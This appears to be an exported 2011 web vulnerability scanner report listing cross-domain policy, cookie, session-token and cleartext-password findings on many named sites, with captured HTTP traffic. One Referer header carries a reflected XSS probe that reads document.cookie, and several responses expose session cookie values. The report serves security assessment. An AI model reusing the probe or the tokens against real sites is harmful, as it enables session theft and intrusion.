The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.odesk.com
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 15 May 2011 13:56:37 GMT Content-Type: text/xml Connection: close Last-Modified: Thu, 12 May 2011 00:05:13 GMT ETag: "c4-4a308f176c040" Accept-Ranges: bytes Content-Length: 196 Vary: Accept-Encoding
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy>
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: a.ligatus.com
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 15:40:39 GMT Server: Apache Last-Modified: Mon, 13 Sep 2010 13:56:24 GMT ETag: "2d282ae-71-4902476407200" Accept-Ranges: bytes Content-Type: text/xml Cache-Control: private, max-age=600 Age: 0 Expires: Sun, 15 May 2011 15:50:39 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: d.ligatus.com
Response
HTTP/1.1 200 OK Accept-Ranges: bytes ETag: W/"315-1288858532000" Last-Modified: Thu, 04 Nov 2010 08:15:32 GMT Content-Type: application/xml Content-Length: 315 Date: Sun, 15 May 2011 15:40:41 GMT Connection: close Server: Apache
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: edge.sharethis.com
Response
HTTP/1.0 200 OK Server: Apache/2.2.14 (Ubuntu) Last-Modified: Fri, 06 May 2011 17:23:38 GMT ETag: "16b43-14a-4a29ec0155a80" Content-Type: application/xml Date: Sun, 15 May 2011 13:59:58 GMT Content-Length: 330 Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: feeds.bbci.co.uk
Response
HTTP/1.0 200 OK Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT Server: Apache Content-Type: text/xml Cache-Control: max-age=11 Expires: Sun, 15 May 2011 13:56:04 GMT Date: Sun, 15 May 2011 13:55:53 GMT Content-Length: 1081 Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: googleads.g.doubleclick.net
Response
HTTP/1.0 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/x-cross-domain-policy; charset=UTF-8 Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Sun, 15 May 2011 10:46:01 GMT Expires: Mon, 16 May 2011 10:46:01 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 9032 Cache-Control: public, max-age=86400
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: hc2.humanclick.com
Response
HTTP/1.1 200 OK Content-Length: 526 Content-Type: text/xml Content-Location: http://hc2.humanclick.com/crossdomain.xml Last-Modified: Thu, 23 Oct 2008 22:13:48 GMT Accept-Ranges: bytes ETag: "076249f5c35c91:da2" Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Date: Sun, 15 May 2011 13:56:55 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: newsrss.bbc.co.uk
Response
HTTP/1.0 200 OK Server: Apache Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT Content-Type: text/xml Cache-Control: max-age=115 Expires: Sun, 15 May 2011 13:57:47 GMT Date: Sun, 15 May 2011 13:55:52 GMT Content-Length: 1081 Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: pagead2.googlesyndication.com
Response
HTTP/1.0 200 OK P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC" Content-Type: text/x-cross-domain-policy; charset=UTF-8 Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Sat, 14 May 2011 16:59:52 GMT Expires: Sun, 15 May 2011 16:59:52 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 73547 Cache-Control: public, max-age=86400
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: pubads.g.doubleclick.net
Response
HTTP/1.0 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/x-cross-domain-policy; charset=UTF-8 Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Sun, 15 May 2011 03:47:21 GMT Expires: Mon, 16 May 2011 03:47:21 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 34202 Cache-Control: public, max-age=86400
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: tvgids.upc.nl
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 15:40:40 GMT Server: Apache Last-Modified: Wed, 28 Jul 2010 15:36:40 GMT ETag: "47e004-d2-48c74624ab200" Accept-Ranges: bytes Content-Length: 210 Cache-Control: max-age=5 Expires: Sun, 15 May 2011 15:40:45 GMT Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: w.sharethis.com
Response
HTTP/1.0 200 OK Server: Apache/2.2.14 (Ubuntu) Last-Modified: Fri, 06 May 2011 17:23:38 GMT ETag: "32e87-14a-4a29ec0155a80" Content-Type: application/xml Date: Sun, 15 May 2011 13:59:51 GMT Content-Length: 330 Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.hp.com
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:16:14 GMT Server: Apache Last-Modified: Mon, 17 May 2010 11:29:38 GMT ETag: "8a41ec80" Accept-Ranges: bytes Content-Length: 213 Cache-Control: max-age=7200 Expires: Sun, 15 May 2011 15:16:14 GMT Connection: close Content-Type: application/xml
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.upc.nl
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 15:40:33 GMT Server: Apache Last-Modified: Thu, 13 Jan 2011 11:26:11 GMT ETag: "3e350a-1b1-499b895acbac0" Accept-Ranges: bytes Content-Length: 433 Cache-Control: max-age=5 Expires: Sun, 15 May 2011 15:40:38 GMT Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.youtube.com
Response
HTTP/1.0 200 OK Date: Sun, 15 May 2011 14:06:56 GMT Server: Apache Last-Modified: Fri, 13 May 2011 03:51:08 GMT ETag: "132-4a320373f0300" Accept-Ranges: bytes Content-Length: 306 Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from specific other domains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: t.tmimgcdn.com
Response
HTTP/1.1 200 OK Server: nginx/0.8.36 Date: Sun, 15 May 2011 13:56:59 GMT Content-Type: application/xml Connection: close Last-Modified: Mon, 07 Jun 2010 12:27:24 GMT ETag: "3d88165-105-4886fcb83c300" Accept-Ranges: bytes Content-Length: 261 Expires: Wed, 09 May 2012 13:56:59 GMT Cache-Control: max-age=31104000 X-Cache: MISS
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
The application publishes a Flash cross-domain policy which allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.templatemonster.com
Response
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Sun, 15 May 2011 13:59:36 GMT Content-Type: application/xml Connection: close Last-Modified: Mon, 07 Jun 2010 12:27:24 GMT ETag: "3d88165-105-4886fcb83c300" Accept-Ranges: bytes Content-Length: 261
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad.doubleclick.net
Response
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 314 Last-Modified: Wed, 21 May 2008 19:54:04 GMT Date: Sun, 15 May 2011 13:16:52 GMT
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: c.gelifesciences.com
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:18:55 GMT Server: Omniture DC/2.0.0 xserver: www74 Content-Length: 263 Keep-Alive: timeout=15 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: iinet.122.2o7.net
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:16:32 GMT Server: Omniture DC/2.0.0 xserver: www323 Content-Length: 263 Keep-Alive: timeout=15 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: j2global.122.2o7.net
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:16:31 GMT Server: Omniture DC/2.0.0 xserver: www9 Content-Length: 263 Keep-Alive: timeout=15 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: met1.hp.com
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:17:02 GMT Server: Omniture DC/2.0.0 xserver: www81 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: upc.d2.sc.omtrdc.net
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 15:40:45 GMT Server: Omniture DC/2.0.0 xserver: www9 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: d.ligatus.com
Response
HTTP/1.1 200 OK Accept-Ranges: bytes ETag: W/"1167-1291379570000" Last-Modified: Fri, 03 Dec 2010 12:32:50 GMT Content-Type: application/xml Content-Length: 1167 Date: Sun, 15 May 2011 15:40:41 GMT Connection: close Server: Apache
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /passwordrecovery/ HTTP/1.1 Host: secure1.wn.com.au Connection: keep-alive Referer: https://webmail.westnet.com.au/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:21:34 GMT Content-Type: text/html; charset=utf-8 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=czqop0naxbczvi2xp4s3vx45; path=/; HttpOnly Vary: Accept-Encoding Content-Length: 14817
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Westnet - Password Recovery</title> <meta name="Keywords" content="Wes ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr"> <head> <title>WideVOIP</title> <meta na ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.
It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?vid=139237823&eid=49&tid=null&tag=landing&ref=http%3A//www.teleflora.com/ HTTP/1.1 Host: cts-log.channelintelligence.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1819375;type=telef451;cat=telef469;ord=1;num=3476285561919.2124? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:18:48 GMT Server: Jetty(6.1.22) Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: serverstamp=4C33DB3C-A4E9-E1AE-6596-9AA13B00657D;Domain=.channelintelligence.com;Expires=Wed, 12-May-21 13:18:48 GMT Set-Cookie: sessionstamp=E5D27090-A511-99DB-5353-545157305174;Domain=.channelintelligence.com;Expires=Sun, 15-May-11 14:18:48 GMT Cache-Control: private,no-store Content-Length: 42 pragma: no-cache content-type: image/gif X-Powered-By: Mirror Image Internet P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP" Via: 1.1 dfw061005 (MII-APC/1.6)
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.cvtelecom.cv Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:16:47 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.11 Set-Cookie: SESSd45f694fe0a9cd7f98205f36db4e321c=uu217t5m2qripfeaju7esenpd2; path=/; domain=.cvtelecom.cv Last-Modified: Wed, 11 May 2011 18:24:18 GMT ETag: "2c7249aeff48e50d52e963975adf4829" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-pt" lang="pt-pt" dir="ltr"> <he ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.oscommerce-manager.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
SESS0684c6974b27be9f5aede608f11c100b=b477739a076f4cf3a3fad936f37a2922; expires=Tue, 07 Jun 2011 17:17:16 GMT; path=/; domain=.servercentral.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pxoxicm?oxid=55c24d3f-420f-e5d1-3d86-830e190a9e3c HTTP/1.1 Host: a.triggit.com Proxy-Connection: keep-alive Referer: http://www.oscommerce-manager.com/?8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d=1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Set-Cookie: trgu=962ff5fc-04a1-4f8a-bd23-abf5347b50b4; domain=.triggit.com; path=/; expires=Sun, 15-May-2016 00:00:00 GMT; Content-Type: image/gif P3P: CP="DEVo PSDo OUR BUS DSP ALL COR" Date: Sun, 15 May 2011 14:06:34 GMT Content-Length: 43
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
(new Image(0,0)).src='http://ad.doubleclick.net/activity;src=1897549;dcnet=4591;boom=18245;sz=1x1;ord='; (new Image(0,0)).src='http://ad.yieldmanager.com/pixel?t=2&id=562523&id=390905'; (new Imag ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=684&id=1&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1819375;type=telef451;cat=telef469;ord=1;num=3476285561919.2124? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
